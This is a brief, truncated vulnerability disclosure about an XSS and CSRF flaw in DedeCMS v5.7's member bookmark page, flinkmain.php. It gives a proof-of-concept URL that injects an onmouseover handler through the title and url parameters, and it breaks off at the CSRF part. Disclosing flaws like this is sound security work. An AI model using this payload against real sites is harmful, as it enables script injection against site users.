DEDECMS v5. 7(2013-06-07) xss+csrf 0day-vulnerability warning-the black bar safety net

Bookmark management existxss+csrf http://localhost/dedecms/member/flinkmain.php xss:http://localhost/dedecms/member/flinkmain.php?dopost=addnew&title=test' onmouseover=alert1;'&url=test' onmouseover=alert1;' CSRF:img...